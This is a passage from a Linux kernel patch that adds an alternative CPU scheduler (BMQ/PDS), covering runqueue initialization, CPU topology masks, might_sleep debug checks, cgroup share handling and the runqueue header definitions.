++	/* Handle pending wakeups and then migrate everything off */
++	sched_tick_stop(cpu);
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
++		WARN(true, "Dying CPU not properly vacated!");
++		dump_rq_tasks(rq, KERN_WARNING);
++	}
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	calc_load_migrate(rq);
++	hrtick_clear(rq);
++	return 0;
++}
++#endif
++
++#ifdef CONFIG_SMP
++static void sched_init_topology_cpumask_early(void)
++{
++	int cpu;
++	cpumask_t *tmp;
++
++	for_each_possible_cpu(cpu) {
++		/* init topo masks */
++		tmp = per_cpu(sched_cpu_topo_masks, cpu);
++
++		cpumask_copy(tmp, cpumask_of(cpu));
++		tmp++;
++		cpumask_copy(tmp, cpu_possible_mask);
++		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
++		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
++		/*per_cpu(sd_llc_id, cpu) = cpu;*/
++	}
++}
++
++#define TOPOLOGY_CPUMASK(name, mask, last)\
++	if (cpumask_and(topo, topo, mask)) {					\
++		cpumask_copy(topo, mask);					\
++		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
++		       cpu, (topo++)->bits[0]);					\
++	}									\
++	if (!last)								\
++		cpumask_complement(topo, mask)
++
++static void sched_init_topology_cpumask(void)
++{
++	int cpu;
++	cpumask_t *topo;
++
++	for_each_online_cpu(cpu) {
++		/* take chance to reset time slice for idle tasks */
++		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
++
++		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++
++		cpumask_complement(topo, cpumask_of(cpu));
++#ifdef CONFIG_SCHED_SMT
++		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
++#endif
++		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
++		per_cpu(sched_cpu_llc_mask, cpu) = topo;
++		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
++
++		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
++
++		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
++
++		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
++		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
++		       cpu, per_cpu(sd_llc_id, cpu),
++		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
++			      per_cpu(sched_cpu_topo_masks, cpu)));
++	}
++}
++#endif
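++
++/*
++ * Worked example (illustrative): on a 4-CPU box with 2 cores x 2 SMT
++ * threads, the loop above leaves cpu0 with
++ *
++ *   sched_cpu_topo_masks[0] = {0}          itself
++ *   sched_cpu_topo_masks[1] = {0,1}        SMT siblings
++ *   sched_cpu_topo_masks[2] = {0,1,2,3}    coregroup / LLC
++ *
++ * and sched_cpu_llc_mask pointing at the LLC slot, so lookups prefer
++ * the CPU itself, then its sibling, then the rest of the LLC.
++ */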
++
++void __init sched_init_smp(void)
++{
++	/* Move init over to a non-isolated CPU */
++	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
++		BUG();
++	current->flags &= ~PF_NO_SETAFFINITY;
++
++	sched_init_topology_cpumask();
++
++	sched_smp_initialized = true;
++}
++#else
++void __init sched_init_smp(void)
++{
++	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
++}
++#endif /* CONFIG_SMP */
++
++int in_sched_functions(unsigned long addr)
++{
++	return in_lock_functions(addr) ||
++		(addr >= (unsigned long)__sched_text_start
++		&& addr < (unsigned long)__sched_text_end);
++}
++
++#ifdef CONFIG_CGROUP_SCHED
++/* task group related information */
++struct task_group {
++	struct cgroup_subsys_state css;
++
++	struct rcu_head rcu;
++	struct list_head list;
++
++	struct task_group *parent;
++	struct list_head siblings;
++	struct list_head children;
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	unsigned long		shares;
++#endif
++};
++
++/*
++ * Default task group.
++ * Every task in system belongs to this group at bootup.
++ */
++struct task_group root_task_group;
++LIST_HEAD(task_groups);
++
++/* Cacheline aligned slab cache for task_group */
++static struct kmem_cache *task_group_cache __read_mostly;
++#endif /* CONFIG_CGROUP_SCHED */
++
++void __init sched_init(void)
++{
++	int i;
++	struct rq *rq;
++
++	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
++
++	wait_bit_init();
++
++#ifdef CONFIG_SMP
++	for (i = 0; i < SCHED_QUEUE_BITS; i++)
++		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++	task_group_cache = KMEM_CACHE(task_group, 0);
++
++	list_add(&root_task_group.list, &task_groups);
++	INIT_LIST_HEAD(&root_task_group.children);
++	INIT_LIST_HEAD(&root_task_group.siblings);
++#endif /* CONFIG_CGROUP_SCHED */
++	for_each_possible_cpu(i) {
++		rq = cpu_rq(i);
++
++		sched_queue_init(&rq->queue);
++		rq->prio = IDLE_TASK_SCHED_PRIO;
++		rq->skip = NULL;
++
++		raw_spin_lock_init(&rq->lock);
++		rq->nr_running = rq->nr_uninterruptible = 0;
++		rq->calc_load_active = 0;
++		rq->calc_load_update = jiffies + LOAD_FREQ;
++#ifdef CONFIG_SMP
++		rq->online = false;
++		rq->cpu = i;
++
++#ifdef CONFIG_SCHED_SMT
++		rq->active_balance = 0;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
++#endif
++		rq->balance_callback = &balance_push_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++		rcuwait_init(&rq->hotplug_wait);
++#endif
++#endif /* CONFIG_SMP */
++		rq->nr_switches = 0;
++
++		hrtick_rq_init(rq);
++		atomic_set(&rq->nr_iowait, 0);
++	}
++#ifdef CONFIG_SMP
++	/* Set rq->online for cpu 0 */
++	cpu_rq(0)->online = true;
++#endif
++	/*
++	 * The boot idle thread does lazy MMU switching as well:
++	 */
++	mmgrab(&init_mm);
++	enter_lazy_tlb(&init_mm, current);
++
++	/*
++	 * The idle task doesn't need the kthread struct to function, but it
++	 * is dressed up as a per-CPU kthread and thus needs to play the part
++	 * if we want to avoid special-casing it in code that deals with per-CPU
++	 * kthreads.
++	 */
++	WARN_ON(!set_kthread_struct(current));
++
++	/*
++	 * Make us the idle thread. Technically, schedule() should not be
++	 * called from this thread, however somewhere below it might be,
++	 * but because we are the idle thread, we just pick up running again
++	 * when this runqueue becomes "idle".
++	 */
++	init_idle(current, smp_processor_id());
++
++	calc_load_update = jiffies + LOAD_FREQ;
++
++#ifdef CONFIG_SMP
++	idle_thread_set_boot_cpu();
++	balance_push_set(smp_processor_id(), false);
++
++	sched_init_topology_cpumask_early();
++#endif /* SMP */
++
++	psi_init();
++
++	preempt_dynamic_init();
++}
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++
++void __might_sleep(const char *file, int line)
++{
++	unsigned int state = get_current_state();
++	/*
++	 * Blocking primitives will set (and therefore destroy) current->state,
++	 * since we will exit with TASK_RUNNING make sure we enter with it,
++	 * otherwise we will destroy state.
++	 */
++	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
++			"do not call blocking ops when !TASK_RUNNING; "
++			"state=%x set at [<%p>] %pS\n", state,
++			(void *)current->task_state_change,
++			(void *)current->task_state_change);
++
++	__might_resched(file, line, 0);
++}
++EXPORT_SYMBOL(__might_sleep);
++
++static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
++{
++	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
++		return;
++
++	if (preempt_count() == preempt_offset)
++		return;
++
++	pr_err("Preemption disabled at:");
++	print_ip_sym(KERN_ERR, ip);
++}
++
++static inline bool resched_offsets_ok(unsigned int offsets)
++{
++	unsigned int nested = preempt_count();
++
++	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
++
++	return nested == offsets;
++}
++
++void __might_resched(const char *file, int line, unsigned int offsets)
++{
++	/* Ratelimiting timestamp: */
++	static unsigned long prev_jiffy;
++
++	unsigned long preempt_disable_ip;
++
++	/* WARN_ON_ONCE() by default, no rate limit required: */
++	rcu_sleep_check();
++
++	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
++	     !is_idle_task(current) && !current->non_block_count) ||
++	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
++	    oops_in_progress)
++		return;
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	/* Save this before calling printk(), since that will clobber it: */
++	preempt_disable_ip = get_preempt_disable_ip(current);
++
++	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
++	       file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), current->non_block_count,
++	       current->pid, current->comm);
++	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
++	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
++
++	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
++		pr_err("RCU nest depth: %d, expected: %u\n",
++		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
++	}
++
++	if (task_stack_end_corrupted(current))
++		pr_emerg("Thread overran stack, or stack corrupted\n");
++
++	debug_show_held_locks(current);
++	if (irqs_disabled())
++		print_irqtrace_events(current);
++
++	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
++				 preempt_disable_ip);
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL(__might_resched);
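++
++/*
++ * Illustrative only: the check above typically fires when sleeping in
++ * atomic context, e.g.
++ *
++ *   preempt_disable();
++ *   might_sleep();   <-- emits "BUG: sleeping function called from
++ *                        invalid context" via __might_resched()
++ *   preempt_enable();
++ */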
++
++void __cant_sleep(const char *file, int line, int preempt_offset)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > preempt_offset)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
++	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
++			in_atomic(), irqs_disabled(),
++			current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_sleep);
++
++#ifdef CONFIG_SMP
++void __cant_migrate(const char *file, int line)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (is_migration_disabled(current))
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > 0)
++		return;
++
++	if (current->migration_flags & MDF_FORCE_ENABLED)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
++	       current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_migrate);
++#endif
++#endif
++
++#ifdef CONFIG_MAGIC_SYSRQ
++void normalize_rt_tasks(void)
++{
++	struct task_struct *g, *p;
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++	};
++
++	read_lock(&tasklist_lock);
++	for_each_process_thread(g, p) {
++		/*
++		 * Only normalize user tasks:
++		 */
++		if (p->flags & PF_KTHREAD)
++			continue;
++
++		schedstat_set(p->stats.wait_start,  0);
++		schedstat_set(p->stats.sleep_start, 0);
++		schedstat_set(p->stats.block_start, 0);
++
++		if (!rt_task(p)) {
++			/*
++			 * Renice negative nice level userspace
++			 * tasks back to 0:
++			 */
++			if (task_nice(p) < 0)
++				set_user_nice(p, 0);
++			continue;
++		}
++
++		__sched_setscheduler(p, &attr, false, false);
++	}
++	read_unlock(&tasklist_lock);
++}
++#endif /* CONFIG_MAGIC_SYSRQ */
++
++#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
++/*
++ * These functions are only useful for the IA64 MCA handling, or kdb.
++ *
++ * They can only be called when the whole system has been
++ * stopped - every CPU needs to be quiescent, and no scheduling
++ * activity can take place. Using them for anything else would
++ * be a serious bug, and as a result, they aren't even visible
++ * under any other configuration.
++ */
++
++/**
++ * curr_task - return the current task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ *
++ * Return: The current task for @cpu.
++ */
++struct task_struct *curr_task(int cpu)
++{
++	return cpu_curr(cpu);
++}
++
++#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
++
++#ifdef CONFIG_IA64
++/**
++ * ia64_set_curr_task - set the current task for a given CPU.
++ * @cpu: the processor in question.
++ * @p: the task pointer to set.
++ *
++ * Description: This function must only be used when non-maskable interrupts
++ * are serviced on a separate stack.  It allows the architecture to switch the
++ * notion of the current task on a CPU in a non-blocking manner.  This function
++ * must be called with all CPUs synchronised and interrupts disabled; the
++ * caller must save the original value of the current task (see
++ * curr_task() above) and restore that value before reenabling interrupts and
++ * re-starting the system.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ */
++void ia64_set_curr_task(int cpu, struct task_struct *p)
++{
++	cpu_curr(cpu) = p;
++}
++
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++static void sched_free_group(struct task_group *tg)
++{
++	kmem_cache_free(task_group_cache, tg);
++}
++
++static void sched_free_group_rcu(struct rcu_head *rhp)
++{
++	sched_free_group(container_of(rhp, struct task_group, rcu));
++}
++
++static void sched_unregister_group(struct task_group *tg)
++{
++	/*
++	 * We have to wait for yet another RCU grace period to expire, as
++	 * print_cfs_stats() might run concurrently.
++	 */
++	call_rcu(&tg->rcu, sched_free_group_rcu);
++}
++
++/* allocate runqueue etc for a new task group */
++struct task_group *sched_create_group(struct task_group *parent)
++{
++	struct task_group *tg;
++
++	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
++	if (!tg)
++		return ERR_PTR(-ENOMEM);
++
++	return tg;
++}
++
++void sched_online_group(struct task_group *tg, struct task_group *parent)
++{
++}
++
++/* rcu callback to free various structures associated with a task group */
++static void sched_unregister_group_rcu(struct rcu_head *rhp)
++{
++	/* Now it should be safe to free those cfs_rqs: */
++	sched_unregister_group(container_of(rhp, struct task_group, rcu));
++}
++
++void sched_destroy_group(struct task_group *tg)
++{
++	/* Wait for possible concurrent references to cfs_rqs complete: */
++	call_rcu(&tg->rcu, sched_unregister_group_rcu);
++}
++
++void sched_release_group(struct task_group *tg)
++{
++}
++
++static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
++{
++	return css ? container_of(css, struct task_group, css) : NULL;
++}
++
++static struct cgroup_subsys_state *
++cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
++{
++	struct task_group *parent = css_tg(parent_css);
++	struct task_group *tg;
++
++	if (!parent) {
++		/* This is early initialization for the top cgroup */
++		return &root_task_group.css;
++	}
++
++	tg = sched_create_group(parent);
++	if (IS_ERR(tg))
++		return ERR_PTR(-ENOMEM);
++	return &tg->css;
++}
++
++/* Expose task group only after completing cgroup initialization */
++static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++	struct task_group *parent = css_tg(css->parent);
++
++	if (parent)
++		sched_online_group(tg, parent);
++	return 0;
++}
++
++static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	sched_release_group(tg);
++}
++
++static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	/*
++	 * Relies on the RCU grace period between css_released() and this.
++	 */
++	sched_unregister_group(tg);
++}
++
++#ifdef CONFIG_RT_GROUP_SCHED
++static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
++{
++	return 0;
++}
++#endif
++
++static void cpu_cgroup_attach(struct cgroup_taskset *tset)
++{
++}
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++static DEFINE_MUTEX(shares_mutex);
++
++int sched_group_set_shares(struct task_group *tg, unsigned long shares)
++{
++	/*
++	 * We can't change the weight of the root cgroup.
++	 */
++	if (&root_task_group == tg)
++		return -EINVAL;
++
++	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
++
++	mutex_lock(&shares_mutex);
++	if (tg->shares == shares)
++		goto done;
++
++	tg->shares = shares;
++done:
++	mutex_unlock(&shares_mutex);
++	return 0;
++}
++
++static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
++				struct cftype *cftype, u64 shareval)
++{
++	if (shareval > scale_load_down(ULONG_MAX))
++		shareval = MAX_SHARES;
++	return sched_group_set_shares(css_tg(css), scale_load(shareval));
++}
++
++static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
++			       struct cftype *cft)
++{
++	struct task_group *tg = css_tg(css);
++
++	return (u64) scale_load_down(tg->shares);
++}
++#endif
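++
++/*
++ * Usage sketch (cgroup v1; the mount point and group name are
++ * hypothetical):
++ *
++ *   echo 2048 > /sys/fs/cgroup/cpu/grp/cpu.shares
++ *
++ * lands in cpu_shares_write_u64(), which scales the value with
++ * scale_load(); sched_group_set_shares() then clamps it to
++ * [MIN_SHARES, MAX_SHARES] and stores it in tg->shares.
++ */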
++
++static struct cftype cpu_legacy_files[] = {
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	{
++		.name = "shares",
++		.read_u64 = cpu_shares_read_u64,
++		.write_u64 = cpu_shares_write_u64,
++	},
++#endif
++	{ }	/* Terminate */
++};
++
++
++static struct cftype cpu_files[] = {
++	{ }	/* terminate */
++};
++
++static int cpu_extra_stat_show(struct seq_file *sf,
++			       struct cgroup_subsys_state *css)
++{
++	return 0;
++}
++
++struct cgroup_subsys cpu_cgrp_subsys = {
++	.css_alloc	= cpu_cgroup_css_alloc,
++	.css_online	= cpu_cgroup_css_online,
++	.css_released	= cpu_cgroup_css_released,
++	.css_free	= cpu_cgroup_css_free,
++	.css_extra_stat_show = cpu_extra_stat_show,
++#ifdef CONFIG_RT_GROUP_SCHED
++	.can_attach	= cpu_cgroup_can_attach,
++#endif
++	.attach		= cpu_cgroup_attach,
++	.legacy_cftypes	= cpu_legacy_files,
++	.dfl_cftypes	= cpu_files,
++	.early_init	= true,
++	.threaded	= true,
++};
++#endif	/* CONFIG_CGROUP_SCHED */
++
++#undef CREATE_TRACE_POINTS
+diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
+new file mode 100644
+index 000000000000..1212a031700e
+--- /dev/null
++++ b/kernel/sched/alt_debug.c
+@@ -0,0 +1,31 @@
++/*
++ * kernel/sched/alt_debug.c
++ *
++ * Print the alt scheduler debugging details
++ *
++ * Author: Alfred Chen
++ * Date  : 2020
++ */
++#include "sched.h"
++
++/*
++ * This allows printing both to /proc/sched_debug and
++ * to the console
++ */
++#define SEQ_printf(m, x...)			\
++ do {						\
++	if (m)					\
++		seq_printf(m, x);		\
++	else					\
++		pr_cont(x);			\
++ } while (0)
++
++void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
++			  struct seq_file *m)
++{
++	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
++						get_nr_threads(p));
++}
++
++void proc_sched_set_task(struct task_struct *p)
++{}
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+new file mode 100644
+index 000000000000..e3b6320a397a
+--- /dev/null
++++ b/kernel/sched/alt_sched.h
+@@ -0,0 +1,667 @@
++#ifndef ALT_SCHED_H
++#define ALT_SCHED_H
++
++#include <linux/context_tracking.h>
++#include <linux/psi.h>
++#include <linux/stop_machine.h>
++#include <linux/syscalls.h>
++#include <linux/tick.h>
++
++#include <trace/events/power.h>
++#include <trace/events/sched.h>
++
++#include "../workqueue_internal.h"
++
++#include "cpupri.h"
++
++#ifdef CONFIG_SCHED_BMQ
++/* bits:
++ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
++#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
++#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
++#endif /* CONFIG_SCHED_PDS */
++
++#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
++
++#ifdef CONFIG_SCHED_DEBUG
++# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
++extern void resched_latency_warn(int cpu, u64 latency);
++#else
++# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
++static inline void resched_latency_warn(int cpu, u64 latency) {}
++#endif
++
++/*
++ * Increase resolution of nice-level calculations for 64-bit architectures.
++ * The extra resolution improves shares distribution and load balancing of
++ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
++ * hierarchies, especially on larger systems. This is not a user-visible change
++ * and does not change the user-interface for setting shares/weights.
++ *
++ * We increase resolution only if we have enough bits to allow this increased
++ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
++ * are pretty high and the returns do not justify the increased costs.
++ *
++ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
++ * increase coverage and consistency always enable it on 64-bit platforms.
++ */
++#ifdef CONFIG_64BIT
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
++# define scale_load_down(w) \
++({ \
++	unsigned long __w = (w); \
++	if (__w) \
++		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
++	__w; \
++})
++#else
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		(w)
++# define scale_load_down(w)	(w)
++#endif
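++
++/*
++ * Worked example (64-bit, SCHED_FIXEDPOINT_SHIFT == 10):
++ *
++ *   scale_load(1024)         == 1024 << 10 == 1048576
++ *   scale_load_down(1048576) == 1024
++ *   scale_load_down(1)       == 2    (clamped, weights must not hit 0/1)
++ */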
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
++
++/*
++ * A weight of 0 or 1 can cause arithmetic problems.
++ * The weight of a cfs_rq is the sum of the weights of the entities
++ * queued on it, so the weight of an entity should not be too large;
++ * the same holds for the shares value of a task group.
++ * (The default weight is 1024 - so there's no practical
++ *  limitation from this.)
++ */
++#define MIN_SHARES		(1UL <<  1)
++#define MAX_SHARES		(1UL << 18)
++#endif
++
++/*
++ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
++ */
++#ifdef CONFIG_SCHED_DEBUG
++# define const_debug __read_mostly
++#else
++# define const_debug const
++#endif
++
++/* task_struct::on_rq states: */
++#define TASK_ON_RQ_QUEUED	1
++#define TASK_ON_RQ_MIGRATING	2
++
++static inline int task_on_rq_queued(struct task_struct *p)
++{
++	return p->on_rq == TASK_ON_RQ_QUEUED;
++}
++
++static inline int task_on_rq_migrating(struct task_struct *p)
++{
++	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
++}
++
++/*
++ * wake flags
++ */
++#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
++#define WF_FORK		0x02		/* child wakeup after fork */
++#define WF_MIGRATED	0x04		/* internal use, task got migrated */
++
++#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
++
++struct sched_queue {
++	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
++	struct list_head heads[SCHED_BITS];
++};
++
++struct rq;
++struct balance_callback {
++	struct balance_callback *next;
++	void (*func)(struct rq *rq);
++};
++
++/*
++ * This is the main, per-CPU runqueue data structure.
++ * This data should only be modified by the local cpu.
++ */
++struct rq {
++	/* runqueue lock: */
++	raw_spinlock_t lock;
++
++	struct task_struct __rcu *curr;
++	struct task_struct *idle, *stop, *skip;
++	struct mm_struct *prev_mm;
++
++	struct sched_queue	queue;
++#ifdef CONFIG_SCHED_PDS
++	u64			time_edge;
++#endif
++	unsigned long prio;
++
++	/* switch count */
++	u64 nr_switches;
++
++	atomic_t nr_iowait;
++
++#ifdef CONFIG_SCHED_DEBUG
++	u64 last_seen_need_resched_ns;
++	int ticks_without_resched;
++#endif
++
++#ifdef CONFIG_MEMBARRIER
++	int membarrier_state;
++#endif
++
++#ifdef CONFIG_SMP
++	int cpu;		/* cpu of this runqueue */
++	bool online;
++
++	unsigned int		ttwu_pending;
++	unsigned char		nohz_idle_balance;
++	unsigned char		idle_balance;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	struct sched_avg	avg_irq;
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++	int active_balance;
++	struct cpu_stop_work	active_balance_work;
++#endif
++	struct balance_callback	*balance_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++	struct rcuwait		hotplug_wait;
++#endif
++	unsigned int		nr_pinned;
++
++#endif /* CONFIG_SMP */
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	u64 prev_irq_time;
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++#ifdef CONFIG_PARAVIRT
++	u64 prev_steal_time;
++#endif /* CONFIG_PARAVIRT */
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	u64 prev_steal_time_rq;
++#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
++
++	/* For general cpu load util */
++	s32 load_history;
++	u64 load_block;
++	u64 load_stamp;
++
++	/* calc_load related fields */
++	unsigned long calc_load_update;
++	long calc_load_active;
++
++	u64 clock, last_tick;
++	u64 last_ts_switch;
++	u64 clock_task;
++
++	unsigned int  nr_running;
++	unsigned long nr_uninterruptible;
++
++#ifdef CONFIG_SCHED_HRTICK
++#ifdef CONFIG_SMP
++	call_single_data_t hrtick_csd;
++#endif
++	struct hrtimer		hrtick_timer;
++	ktime_t			hrtick_time;
++#endif
++
++#ifdef CONFIG_SCHEDSTATS
++
++	/* latency stats */
++	struct sched_info rq_sched_info;
++	unsigned long long rq_cpu_time;
++	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
++
++	/* sys_sched_yield() stats */
++	unsigned int yld_count;
++
++	/* schedule() stats */
++	unsigned int sched_switch;
++	unsigned int sched_count;
++	unsigned int sched_goidle;
++
++	/* try_to_wake_up() stats */
++	unsigned int ttwu_count;
++	unsigned int ttwu_local;
++#endif /* CONFIG_SCHEDSTATS */
++
++#ifdef CONFIG_CPU_IDLE
++	/* Must be inspected within a rcu lock section */
++	struct cpuidle_state *idle_state;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++#ifdef CONFIG_SMP
++	call_single_data_t	nohz_csd;
++#endif
++	atomic_t		nohz_flags;
++#endif /* CONFIG_NO_HZ_COMMON */
++};
++
++extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
++
++extern unsigned long calc_load_update;
++extern atomic_long_t calc_load_tasks;
++
++extern void calc_global_load_tick(struct rq *this_rq);
++extern long calc_load_fold_active(struct rq *this_rq, long adjust);
++
++DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
++#define this_rq()		this_cpu_ptr(&runqueues)
++#define task_rq(p)		cpu_rq(task_cpu(p))
++#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
++#define raw_rq()		raw_cpu_ptr(&runqueues)
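++
++/*
++ * Example (illustrative): typical use of the accessors above, assuming
++ * the caller holds whatever locks the accessed fields require:
++ *
++ *   struct rq *rq = cpu_rq(cpu);
++ *   struct task_struct *p = cpu_curr(cpu);
++ */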
++
++#ifdef CONFIG_SMP
++#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
++void register_sched_domain_sysctl(void);
++void unregister_sched_domain_sysctl(void);
++#else
++static inline void register_sched_domain_sysctl(void)
++{
++}
++static inline void unregister_sched_domain_sysctl(void)
++{
++}
++#endif
++
++extern bool sched_smp_initialized;
++
++enum {
++	ITSELF_LEVEL_SPACE_HOLDER,
++#ifdef CONFIG_SCHED_SMT
++	SMT_LEVEL_SPACE_HOLDER,
++#endif
++	COREGROUP_LEVEL_SPACE_HOLDER,
++	CORE_LEVEL_SPACE_HOLDER,
++	OTHER_LEVEL_SPACE_HOLDER,
++	NR_CPU_AFFINITY_LEVELS
++};
++
++DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++
++static inline int
++__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
++{
++	int cpu;
++
++	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
++		mask++;
++
++	return cpu;
++}
++
